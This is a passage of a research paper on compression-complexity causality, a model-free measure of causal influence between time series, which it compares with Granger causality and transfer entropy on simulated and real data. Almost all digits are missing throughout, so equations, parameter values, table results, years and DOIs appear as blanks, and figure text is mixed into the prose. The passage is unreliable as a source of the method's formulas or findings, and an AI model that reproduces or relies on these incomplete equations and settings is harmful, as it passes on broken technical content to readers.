constant sequence is defined as the value of etc complexity. for example, the input sequence ‘ ’ gets transformed as follows: → → → → → . thus, etc( )= . etc achieves its minimum value ( ) for a constant sequence and maximum value (m− ) for a m length sequence with distinct symbols. thus, we normalize the etc complexity value by dividing by m− . thus, normalized etc( )= . note that normalized etc values are always between and with low values indicating low complexity and high values indicating high complexity. joint etc measure for a pair of time series: etc(x,y ) we perform a straightforward extension of the above mentioned procedure (etc(x)) for computing the joint etc measure etc(x,y ) for a pair of input time series x and y of the same length. at every iteration, the algorithm scans (from left to right) simultaneously x and y sequences and replaces the most frequent jointly occurring pair with a new symbol for both the pairs. to illustrate it by an example, consider, x = and y =abacac. the pair (x,y ) gets transformed as follows: ( ,abacac) →( ,abdd) →( ,edd) →( ,fd) →( ,g). thus, etc(x,y )= and normalized value is . it can be noted that etc(x,y )≤etc(x)+etc(y ). kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. interventional complexity causality (icc) and compression-complexity causality (ccc) to measure how the dynamics of a process y influence the dynamics of a process x, we intervene to create new hypothetical blocks of time series data, ypast + x, where ypast is a window of length l samples, taken from the immediate past of the window x. these blocks are created by ‘surgery’ and do not exist in reality in the data that is already collected. interventional complexity causality (icc) is defined as the change in the dynamical complexity of time series x when x is seen to be generated jointly by the dynamical evolution of both ypast and xpast as opposed to by the reality of the dynamical evolution of xpast alone. this formulation is actually in line with wiener’s idea, according to which, time series y causes x, if incorporating the past of y helps to improve the prediction of x (wiener, ). while gc is based on the notion of improved predictability and te on the reduction of uncertainty, icc is based on the notion of change in ‘dynamical complexity’ when information from the past of y is brought in, in order to check its causal influence on x. the difference between existing approaches and the proposed measure is that the effect of y on x is analyzed based on ‘associational’ means in case of the former and by ‘interventional’ means in case of the latter. with this formulation, icc is designed to measure effect, like gc and te, and not the mechanism, as in dynamic causal modelling (seth, barrett & barnett, ; barrett & barnett, ). to elaborate on this aspect, icc cannot explicitly quantify the interaction coefficients of the underlying generative model (physical mechanism), but will only estimate causal influence based on change in dynamical complexities. it is, however, expected that icc will be closer to the underlying mechanism than existing methods, because, by its very formulation, it taps on causes and their effects based on dynamical evolution of processes. mathematically, iccypast→ x =dc( x|xpast )−dc( x|xpast,ypast ), ( ) where dc( x|xpast ) is as defined in eq. ( ) and dc( x|xpast,ypast ) is as elaborated below: dc( x|xpast,ypast )=c(xpast + x,ypast + x)−c(xpast,ypast ), ( ) where c(·,·) refers to joint complexity. icc varies with the moving temporal window x and its corresponding ypast , xpast . to estimate average causality from time series y to x, iccypast→ x obtained for all xs are averaged. the above is the generic description of icc that can be estimated using any complexity measure. for the reasons discussed in ‘dynamical complexity (dc) and dynamical compression-complexity (cc)’, we would like to estimate icc using the notion of dynamical compression-complexity estimated by the measure etc. the measure would then become interventional compression-complexity causality. for succinctness, we refer to it as compression-complexity causality (ccc). to estimate ccc, time series blocks xpast , ypast , xpast+ x, and surgically created ypast+ x are separately encoded (binned)— converted to a sequence of symbols using ‘b’ uniformly sized bins for the application of kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. henceforth, the same variables are used to denote the binned/encoded versions of the blocks. etc. for the binned time series blocks, xpast , ypast , xpast + x, ypast + x, to determine whether ypast caused x or not, we first compute dynamical compression-complexities, denoted by cc, cc( x|xpast )=etc(xpast + x)−etc(xpast ), ( ) cc( x|xpast,ypast )=etc(xpast + x,ypast + x)−etc(xpast,ypast ), ( ) equation ( ) gives the dynamical compression-complexity of x as a dynamical evolution of xpast alone. equation ( ) gives the dynamical compression-complexity for x as a dynamical evolution of both xpast and ypast . etc(·) and etc(·,·) refer to individual and joint effort-to-compress complexities. for estimating etc from these small blocks of data, short-term stationarity of x and y is assumed. we now define compression-complexity causality cccypast→ x as: cccypast→ x =cc( x|xpast )−cc( x|xpast,ypast ). ( ) averaged ccc from y to x over the entire length of time series with the window x being slided by a step-size of δ is estimated as— cccy→x =cccypast→ x =cc( x|xpast )−cc( x|xpast,ypast ), ( ) if cc( x|xpast,ypast )≈cc( x|xpast ), then cccy→x is statistically zero, implying no causal influence from y to x. if cccy→x is statistically significantly different from zero, then we infer that y causes x. a higher magnitude of cccy→x implies a higher degree of causation from y to x. the length of xpast,ypast , that is l is chosen by determining the correct intervention point. this is the temporal scale at which y has a dynamical influence on x. detailed criteria and rationale for estimating l and other parameters used in ccc estimation: w (length of x), δ and b for any given pair of time series are discussed in section s . ccc is invariant to local/global scaling and addition of constant value to the time series. as ccc is based on binning of small blocks of time series data, it is noise resistant. furthermore, it is applicable to non-linear and short term stationary time series. being based on dynamical evolution of patterns in the data, it is expected to be robust to sub-sampling and filtering. for multivariate data, ccc can be estimated in a similar way by building dictionaries that encode information from all variables. thus, to check conditional causality from y to x amidst the presence of other variables (say z and w ), two time varying dictionaries are built—d that encodes information from all variables (x, y , z, w ) and d′ that encodes information from all variables except y (x, z, w only). once synchronous time series blocks from each variable are binned, the dictionary at that time point is constructed by obtaining a new sequence of symbols, with each possible combination of symbols from all variables being replaced by a particular symbol. the mechanism for construction of these dictionaries is discussed in section s . subsequently, dynamical compression-complexities are computed as: cc( x|d′past )=etc(d ′ past + x)−etc(d ′ past ), ( ) kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. it should be mentioned that, strictly speaking, kl and jsd are not distance measures since they don’t satisfy the triangle inequality. cc( x|dpast )=etc(dpast + x)−etc(dpast ), ( ) where d′past+ x represents the lossless encoding of joint occurrences of binned time series blocks xpast + x, zpast + x, wpast + x and d′past refers to the lossless encoding of joint occurrences of binned time series blocks xpast , zpast and wpast . similarly, dpast + x represents the lossless encoding of joint occurrences of binned time series blocks xpast+ x, ypast + x,zpast + x, wpast + x and dpast refers to the the lossless encoding of joint occurrences of binned time series blocks xpast , ypast , zpast and wpast . conditional compression-complexity causality, cccypast→ x|zpast,wpast , is then estimated as the difference of eqs. ( ) and ( ). averaged conditional compression complexity-causality over the entire time series with the window x being slided by a step-size of δ is given as below: cccy→x|z,w =cc( x|d ′)−cc( x|d). ( ) positive and negative ccc the dynamical compression-complexities estimated for the purpose of ccc estimation, cc( x|xpast ) and cc( x|xpast,ypast ), can be either positive or negative. for instance, consider the case when cc( x|xpast ) becomes negative. this happens when etc(xpast + x) is less than etc(xpast ), which means that with the appending of x, the sequence xpast has become more structured resulting in reduction of its complexity. the value of cc( x|xpast ) is positive when appending of x makes xpast less structured (hence more complex). similarly, cc( x|xpast,ypast ) can also become negative when etc realizes xpast + x, ypast + x to be more structured than xpast , ypast . when the opposite is true, cc( x|xpast,ypast ) is positive. because of the values that cc( x|xpast ) and cc( x|xpast,ypast ) can take, cccypast→ x can be both positive or negative. how different cases result with different signs of the two quantities along with their implication on ccc is shown in table s of the supplementary material. we see that the sign of cccypast→ x signifies the ‘kind of dynamical influence’ that ypast has on x, whether this dynamical influence is similar to or different from that of xpast on x. when cccypast→ x is −ve, it signifies that ypast has a different dynamical influence on x than xpast . on the contrary, when cccypast→ x is +ve, it signifies that ypast has a dynamical influence on x that is similar to that of xpast . on estimating the averaged ccc from time series y to x, expecting that cccypast→ x values do not vary much with time, we can talk about the kind of dynamical influence that time series y has on x. for weak sense stationary processes, it is intuitive that the influence of y on x would be very different from that on x due to its own past when the distributions of coupled time series y and x are very different. we verify this intuition by measuring probability distribution distances between coupled processes y and x using symmetric kullback–leibler divergence (kl) and jensen–shannon divergence (jsd). the trend of values obtained by these divergence kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. measures is compared with the trend of ccc for different cases such as when ccc is positive or negative. coupled autoregressive (ar) processes were generated as per eq. ( ). also, linearly coupled tent maps were generated as per eqs. ( ) and ( ). symmetric kl and jsd between distribution p and q of coupled processes are estimated as per eqs. ( ) and ( ) respectively. dsymm kl(p,q)=dkl(p‖q)+dkl(q‖p), ( ) where, dkl(p ‖q)= ∑ i p(i)log ( p(i) q(i) ) , dkl(q‖p)= ∑ i q(i)log ( q(i) p(i) ) . ( ) jsd(p ‖q)= d(p ‖m)+ d(q‖m), ( ) where, m = (p+q). kl and jsd values are in unit of nats. curves for kl, jsd and ccc estimated for increasing coupling between ar processes of order and linearly coupled tent maps are shown in figs. and respectively. results for non-linear coupling of tent maps are similar to that for linear coupling and are included (fig. s , section s . ). the values displayed represent the mean over trials. as the degree of coupling is varied for ar processes, there is no clear pattern in kl and jsd values. ccc values increase in the positive direction as expected for increasing coupling, signifying that the dynamical influence from y to x is similar to the influence on x from its own past. also, when we took larger number of trials for ar, the values obtained by kl and jsd become confined to a smaller range and seem to converge towards a constant value indicating that the distributions of x and y are quite similar. however, in case of coupled tent maps (both linear and non-linear coupling), as coupling is increased, the divergence between the distributions of the two coupled processes increases, indicating that their distributions are becoming very different. the values of ccc grow in the negative direction showing that with increasing coupling the independent process y has a very different dynamical influence on x compared to x’s own past. subsequently, due to the synchronization of y and x, kl, jsd as well as ccc become zero. with these graphs, it may not be possible to find a universal threshold for the absolute values of kl/jsd above which ccc will show negative sign. however, if the distributions of the two coupled processes exhibit an increasing divergence (when the coupling parameter is varied) then it does indicate that the independent process would have a very different dynamical influence on the dependent one when compared with that of the dependent process’ own past, suggesting that the value of ccc will grow in the negative direction. the fact that kl/jsd and ccc do not have a one-to-one correspondence is because the former (kl and jsd) operate on first order distributions while the latter (ccc) is able to capture higher-order dynamical influences between the coupled processes. for non-stationary processes, our kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . . . . . s ym m e tr ic k l (a) . . . . . . . . js d (b) . . . . . . c c c (c) figure mean values of divergence between distributions of coupled ar( ) processes using symmetric kullback–leibler (kl) (a) and jensen shannon (jsd) divergences (in nats) (b), and the mean causality values estimated using ccc from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta), as the degree of coupling, � is varied (c). ccc values increase with increasing �. there is no similarity in the trend of kl/jsd to ccc. full-size doi: . /peerjcs. /fig- . . . . . . s ym m e tr ic k l (a) . . . . . . . js d (b) . . . . - . - . . c c c (c) figure mean values of divergence between distributions of linearly coupled tent maps using symmetric kullback leibler (kl) (a) and jensen shannon (jsd) divergences (in nats) (b), and the mean causality values estimated using ccc from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) (c), as the degree of coupling, � is varied. for � < . , ccc and kl/jsd are highly negatively correlated. full-size doi: . /peerjcs. /fig- measure would still be able to capture the kind of dynamical influence, though distributions are not static. both positive and negative ccc imply significant causal influence (ccc≈ implies either no causal influence or identical processes), but the nature of the dynamical influence of the cause on the effect is very different in these two cases. causality turning ‘negative’ does not seem very intuitive at first, but all that it signifies is that the past of the cause variable makes the dynamics of the effect variable less predictable than its (effect’s) own past. such a unique feature could be very useful for real world applications in terms of ‘controlling’ the dynamics of a variable being effected by several variables. if a particular cause, out of several causes that makes the caused ‘less predictable’ and has ‘intrinsically different’ dynamics from that of the effect, needs to be determined and eliminated, it can be readily identified by observing the sign of ccc. informed attempts to inhibit and enforce certain variables of the system can then be made. as the existing model-free methods of causality can extract only ‘associational causality’ and ignore the influence that the cause has on dynamics of the caused, it is impossible for them to comment on the nature of this dynamical influence, something that ccc is kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. uniquely able to accomplish. obviously, model based methods give full-fledged information about ‘the kind of dynamical influence’ owing to the model equations assumed. however, if there are no equations assumed (or known), then the sign and magnitude of ccc seems to be the best choice to capture the cause–effect relationship with additional information on the similarity (or its lack of) between the two dynamics. results and discussion a measure of causality, to be robust for real data, needs to perform well in the presence of noise, filtering, low temporal and amplitude resolution, non-uniformly sampled signals, short length time series as well as the presence of other causal variables in the system. in this section, we rigorously simulate these cases and evaluate the performance of ccc measure by comparing with existing measures—granger causality (gc) and transfer entropy (te). owing to space constraints, some of these results are included in section s . in the last sub-section, we test ccc on real-world datasets. in all cases, we take the averaged value of ccc over entire time series as computed by eq. ( ) (or eq. ( ) in the conditional case) and the parameters for ccc estimation are chosen as per the selection criteria and rationale discussed in section s . gc estimation is done using the mvgc toolbox (barnett & seth, ) in its default settings and te estimation is done using mute toolbox (montalto, faes & marinazzo, ). akaike information criteria is used for model order estimation with the maximum model order set to in the mvgc toolbox, except where specified. the maximum number of lags to take for autocorrelation computation is done automatically by the toolbox. in the mute toolbox, the approach of non uniform embedding for representation of the history of the observed processes and of nearest neighbor estimator for estimating the probability density functions is used for all results in this paper. the number of lags to consider for observed processes was set to and the maximum number of nearest neighbors to consider was set to . varying unidirectional coupling ar( ) autoregressive processes of order one (ar( )) were simulated as follows. x and y are the dependent and independent processes respectively. x(t)=ax(t− )+�y (t− )+εx,t ( ) y (t) =by (t− )+εy,t, where a= . , b= . , t = to , s, sampling period = s. � is varied from − . in steps of . . noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. figure shows the performance of ccc along with that of te and gc as mean values over trials, (ccc settings: l= , w = , δ= , b= ). standard deviation of ccc, te and gc values are shown in fig. . with increasing coupling, the causality estimated by ccc, te as well as gc increases. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . . . . c c c (a) . . . . . . . t e (b) . . . . . g c (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar( ) pro- cesses, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. ccc, te as well as gc are able to correctly quantify causality. full-size doi: . /peerjcs. /fig- . . . . . . s td . d e v. c c c (a) . . . . . . s td . d e v. t e (b) . . . . . . s td . d e v. g c (c) figure standard deviation of causality values estimated using ccc (a), te (b) and gc (c) for cou- pled ar( ) processes, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. full-size doi: . /peerjcs. /fig- ar( ) autoregressive processes of order hundred (ar( ): x dependent, y independent) were simulated as follows. x(t)=ax(t− )+�y (t− )+εx,t y (t)=by (t− )+εy,t, ( ) where a= . , b= . , t = to , s, sampling period = s. � is varied from − . in steps of . . noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. figure shows the performance of ccc along with that of te and gc, as mean values over trials (ccc settings: l= , w = , δ= , b= ). maximum model order was set to in the mvgc toolbox. ccc values increase steadily with increasing coupling for the correct direction of causation. te fails as it shows higher causality from x to y for all �. gc also shows confounding of causality values in two directions. thus, causality in coupled ar processes with long-range memory can be reliably estimated using ccc and not using te or gc. range of standard deviation of ccc values from y to x is . to . for varying parameter � and that from x to y is . to . . these values are much smaller than the mean ccc estimates and thus, causality estimated in the direction of causation and opposite to it remain well separable. for te, y to x, standard deviation range is . to kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . . . . . c c c (a) . . . . t e - (b) . . . . g c - (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar( ) pro- cesses, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. only ccc is able to reliably estimate the correct causal relationship for all values of � while te and gc fail. full-size doi: . /peerjcs. /fig- . and x to y , standard deviation range is . to . . for gc, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . tent map linearly coupled tent maps were simulated as per the following equations. independent process, y , is generated as: y (t)= y (t− ), ≤y (t− )< / , ( ) y (t)= − y (t− ), / ≤y (t− )≤ . the linearly coupled dependent process, x, is as below: x(t)= �y (t)+( −�)h(t), ( ) h(t) = x(t− ), ≤x(t− )< / , h(t) = − x(t− ), / ≤x(t− )≤ , where � is the degree of linear coupling. the length of the signals simulated in this case was , , i.e., t = to , s, sampling period = s and the first , transients were removed to yield , points for causality estimation. figure shows the performance of ccc and te for linearly coupled tent maps as � is varied (ccc settings: l= , w = , δ= , b= ). ccc and te comparison was also done for increasing coupling in the case of non-linearly coupled tent maps. these results are included in the section s . . results obtained are similar to the linear coupling case. the assumption of a linear model for estimation of gc was proved to be erroneous for most trials and hence gc values are not displayed. as � is increased for both linear and non-linear coupling, tey→x increases in the positive direction and then falls to zero when the two series become completely synchronized at �= . . the trend of the magnitude of ccc values is similar to te, however, cccy→x increment is in the negative direction. this is because of the fact that with increasing coupling the kind of dynamical influence kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . - - - - c c c - (a) . . . . . . t e (b) figure mean of causality values estimated using ccc (a) and te (b) for linearly coupled tent maps, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of cou- pling is increased. with increasing coupling (until synchronization), magnitude of ccc and te values in- creases. ccc values are negative while te are positive. full-size doi: . /peerjcs. /fig- from y to x becomes increasingly different than the dynamical influence from the past values of x to itself. in case of linear coupling, range of standard deviation of ccc values from y to x is . to . for different values of � and that from x to y is . to . . for te, y to x, standard deviation range is to . and x to y , standard deviation range is to . . for non-linear coupling, the range of standard deviation values are included in section s . . for both ccc and te, standard deviation values obtained indicate that there might be confounding in the causality values in the direction of causation and the direction opposite to causation for low values of �. varying process noise the performance of measures as process noise is varied is shown in fig. for coupled ar processes simulated as in eq. ( ), where a= . , b= . , �= . , t = to , s, sampling period= s, number of trials= . noise terms, εy,εx =νη, where ν =noise intensity, is varied from . to . and η follows standard normal distribution. ccc settings: l= , w = , δ= , b= . the range of standard deviation of ccc values from y to x is . to . for different values of � and that from x to y is . to . . for te, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . for gc, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . the performance of all three measures is fairly good in this case. only gc values show a slightly increasing trend with increasing noise intensity. non uniform sampling results for causality testing on uniformly downsampled signals are included in the section s . . non-uniformly sampled/non-synchronous measurements are common in real- world physiological data acquisition due to jitters/motion-artifacts as well as due to the inherent nature of signals such as heart rate signals (laguna, moody & mark, ). also, in kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . . . . . c c c (a) . . . . . . . . t e (b) . . . . . . . . g c (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar processes, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the intensity of noise, ν is varied. all the three measures perform well in this case. full-size doi: . /peerjcs. /fig- . . c c c (a) . . . t e (b) . g c (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar processes from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the percentage of non- uniform sampling α is varied. ccc is the only measure that shows reliable, consistent and correct esti- mates of causality. full-size doi: . /peerjcs. /fig- economics, the case of missing data is common (baumöhl & vỳrost, ). to realistically simulate such a scenario, non-uniform sampling was introduced by eliminating data from random locations of the dependent time series and then presenting the resulting series as a set with no knowledge of the time-stamps of the missing data. the percentage of non-uniform sampling/non-synchronous measurements (α) is the percentage of these missing data points. ar processes with non-uniformly sampled signals were simulated as per eq. ( ) with b= . , a= . , �= . . noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. length of original time series, n = , , and is reduced upon increasing the percentage non-uniform sampling α. in order to match the lengths of the two time series, y , the independent time series, is appropriately truncated to match the length of the dependent signal, x (this results in non-synchronous pair of measurements). ccc settings used: l= , w = , δ= , b= . mean causality estimated for trials using the three measures with increasing α, while ν= . , are shown in fig. . linearly coupled tent maps with non-uniformly sampled signals were simulated as per eqs. ( ) and ( ) with �= . . length of original time series, n = , and is reduced upon increasing the percentage non-uniform sampling α. in order to match the lengths of kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. - - c c c - (a) . . t e (b) . . . g c (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled tent maps from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the percentage of non- uniform sampling is varied. ccc is able to distinguish the causality direction but the separation between values is small. te and gc completely fail. full-size doi: . /peerjcs. /fig- the two time series, y , the independent time series, is appropriately truncated to match the length of the dependent signal, x (this results in non-synchronous pair of measurements). ccc settings used: l= , w = , δ= , b= . mean causality estimated for trials using the three measures with increasing increasing α, while ν= . , are shown in fig. . as the results clearly indicate, both te and gc fail when applied to non-uniformly sampled coupled ar and tent map processes. ccc values are relatively invariant to non-uniform sampling and thus could be employed in such scenarios. filtering of coupled signals acquired data preprocessing often involves low pass filtering to smooth out the signal (teplan, ). at other times, high pass filtering is required to remove low frequency glitches from a high frequency signal. also, when the signals acquired are sampled at low frequencies, the effects due to decimation and filtering may add up and result in poorer estimates of causality. this is often the case in fmri signals (glover, ; kim, richter & uurbil, ). to test these scenarios, ar processes were simulated as below: y (t)= . y (t− )+εy,t, x(t)= . x(t− )+ . y (t− )+εx,t, ( ) where, noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. causality values were estimated using ccc, te and gc when simulated signals are low pass filtered using a moving average window of length with step size . the results are shown in table as mean values over trials. ccc settings used: l= , w = , δ= , b= . the performance of the measures when coupled signals are decimated to half the sampling rate and then low pass filtered are also included in the table. the length of the original signal simulated is and is reduced to upon filtering and to upon filtering and decimation. from the table, we see that ccc can distinguish the direction of causality in the original case as well as in the filtering and decimation plus filtering case. erroneously, te shows kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table mean ccc, te and gc estimates for coupled ar processes y (independent) and x (depen- dent) as it is, upon filtering and upon decimation and filtering. system ccc te gc y → x x → y y → x x → y y → x x → y original . − . . . . . filtered . . . . . . decimated and filtered . . . . . . significant causality in the direction opposite to causation upon filtering as well as upon decimation and filtering and gc shows significant causality in the direction opposite to causation upon decimation and filtering. by this we can infer that ccc is highly suitable for practical applications which involve pre-processing such as filtering and decimation of measurements. conditional ccc on short length mvar system a system of three variables was simulated as per the following equations— z(t)= . z(t− )+�z,t, x(t)= . x(t− )+ . z(t− )+�x,t, y (t)= . y (t− )+ . z(t− )+�y,t, ( ) where the noise terms, εz,εx,εy =νη, ν = noise intensity = . and η follows standard normal distribution. length of time series simulated was and first transients were removed to yield short length signals of time points. the coupling direction and strength between variables x, y , z are shown in fig. a. the mean values of causality estimated over trials using ccc, te and gc are shown in fig. tables, (b), (c) and (d) respectively. ccc settings used: l= , w = , δ= , b= . in the tables, true positives are in green, true negatives in black, false positives in red and false negatives in yellow. ccc detects correctly the true positives and negatives. gc, detects the true positives but also shows some false positive couplings. te, performs very poorly, falsely detecting negatives where coupling is present and also showing false positives where there is no coupling. real data ccc was applied to estimate causality on measurements from two real-world systems and compared with te. system (a) comprised of short time series for dynamics of a complex ecosystem, with point recording of predator (didinium) and prey (paramecium) populations, reported in veilleux ( ) and originally acquired for jost & ellner ( ), with first points from each series removed to eliminate transients (fig. a). length of signal on which causality is computed, n = , ccc settings used: l= , w = , δ= , b= . ccc is seen to aptly capture the higher (and direct) causal influence from predator to prey population and lower influence in the opposite direction (see fig. ). the latter is expected, owing to the indirect effect of the change in prey population on predator. ccc kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure mean causality values estimated using ccc (b), te (c) and gc (d) for a system of three ar variables coupled as in (a). true positives are in green, true negatives in black, false positives in red and false negatives in yellow. full-size doi: . /peerjcs. /fig- results are in line with that obtained using convergent cross mapping (sugihara et al., ). te, on the other hand, fails to capture the correct causality direction. system (b) comprised of raw single-unit neuronal membrane potential recordings (v , in v) of squid giant axon in response to stimulus current (i, in v, v= µa/cm ), recorded in paydarfar, forger & clay ( ) and made available by goldberger et al. ( ). we test for the causation from i to v for three axons ( trial each) labeled ‘a t ’, ‘a t ’ and ‘a t ’, extracting , points from each recording. length of signal on which causality is computed, n = , , ccc settings used: l= , w = , δ= , b= . we find that ccci→v is less than or approximately equal to cccv→i and both values are less than zero for the three axons (fig. ), indicating negative causality in both directions. this implies bidirectional dependence between i and v . each brings a different dynamical influence on the other when compared to its own past. te fails to give consistent results for the three axons. conclusions in this work, we have proposed a novel data-based, model-free intervention approach to estimate causality for given time series. the interventional complexity causality measure (or icc) based on capturing causal influences from the dynamical complexities of data is formalized as compression-complexity causality (ccc) and is shown to have the following strengths— • ccc operates on windows of the input time series (or measurements) instead of individual samples. it does not make any assumption of the separability of cause and effect samples. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure ccc, te on real-world time series. (a) time series showing population of didinium na- sutum (dn) and paramecium aurelia (pn) as reported in veilleux ( ), (b) stimulus current (i) and voltage measurements (v ) as recorded from a squid giant axon (‘a t ’) in paydarfar, forger & clay ( ). (c): table showing ccc and te values as estimated for systems (a) and (b). full-size doi: . /peerjcs. /fig- • ccc doesn’t make any assumptions of stochasticity, determinism, gaussianity, stationarity, linearity or markovian property. thus, ccc is applicable even on non-stationary/ non-linear/non-gaussian/non-markovian, short-term and long-term memory processes, as well as chaotic processes. ccc characterizes causal relationship based on dynamical complexity computed from windows of the input data. • ccc is uniquely and distinctly novel in its approach since it does not estimate ‘associational’ causality (first rung on ladder of causation) but performs ‘intervention’ (second rung on the ladder of causation) to capture causal influences from the dynamics of the data. • the point of ‘intervention’ (length l for creating the hypothetical data: ypast + x) is dependent on the temporal scale at which causality exists within and between processes. it is determined adaptively based on the given data. this makes ccc a highly data- driven/data-adaptive method and thus suitable for a wide range of applications. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. • infotheoretic causality measures such as te and others need to estimate joint probability densities which are very difficult to reliably estimate with short and noisy time series. on the other hand, ccc uses effort-to-compress (etc) complexity measure over short windows to capture time-varying causality and it is well established in literature that etc outperforms infotheoretic measures for short and noisy data (nagaraj & balasubramanian, a; balasubramanian & nagaraj, ). • ccc can be either positive or negative (unlike te and gc). by this unique property, ccc gives information about the kind of causal influence that is brought by one time series on another, whether this influence is similar (ccc > ) to or different (ccc < ) from the influence that the series brings to its own present. • negative ccc could be used for ‘control’ of processes by intervening selectively on those variables which are dissimilar (ccc < )/similar (ccc > ) in terms of their dynamics. • ccc is highly robust and reliable, and overcomes the limitations of existing measures (gc and te) in case of signals with long-term memory, low temporal resolution, noise, filtering, non-uniform sampling (non-synchronous measurements), finite length signals, presence of common driving variables as well as on real datasets. we have rigorously demonstrated the performance of ccc in this work. given the above listed novel properties of ccc and its unique model-free, data-driven, data-adaptive intervention-based approach to causal reasoning, it has the potential to be applied in a wide variety of real-world applications. future work would involve testing the measure on simulated networks with complex interactions as well as more real world datasets. we would like to further explore the idea of negative ccc and check its relation to lyaupnov exponent (for chaotic systems) which can characterize the degree of chaos in a system. it is also worthwhile to explore the performance of other complexity measures such as lempel–ziv complexity for the proposed interventional complexity causality. we provide free open access to the ccc matlab toolbox developed as a part of this work. see section s for details. list of abbreviations ar autoregressive c(· ) complexity cc dynamical compression-complexity ccc compression-complexity causality cr complexity rate etc(· ) effort-to-compress gc granger causality jsd jensen–shannon divergence lz lempel–ziv complexity mvar multivariate autoregressive c(·,· ) joint complexity cc averaged dynamical compression-complexity ccc averaged compression-complexity causality dc dynamical complexity kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. etc(·,· ) joint effort-to-compress icc interventional complexity causality kl kullback–leibler divergence te transfer entropy acknowledgements aditi kathpalia is thankful to manipal academy of higher education for permitting this research as part of the phd programme. additional information and declarations funding this work was supported by tata trusts and cognitive science research initiative (csri- dst) grant no. dst/csri/ / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: tata trusts and cognitive science research initiative (csri-dst): grant no. dst/csri/ / . competing interests the authors declare there are no competing interests. author contributions • aditi kathpalia and nithin nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: in text s , we provide details of our proposed method compression-complexity causality (ccc). the text also provides details of the matlab toolbox for computation of ccc, made available as supplemental material. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references balasubramanian k, nagaraj n. . aging and cardiovascular complexity: effect of the length of rr tachograms. peerj :e doi . /peerj. . kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj. http://dx.doi.org/ . 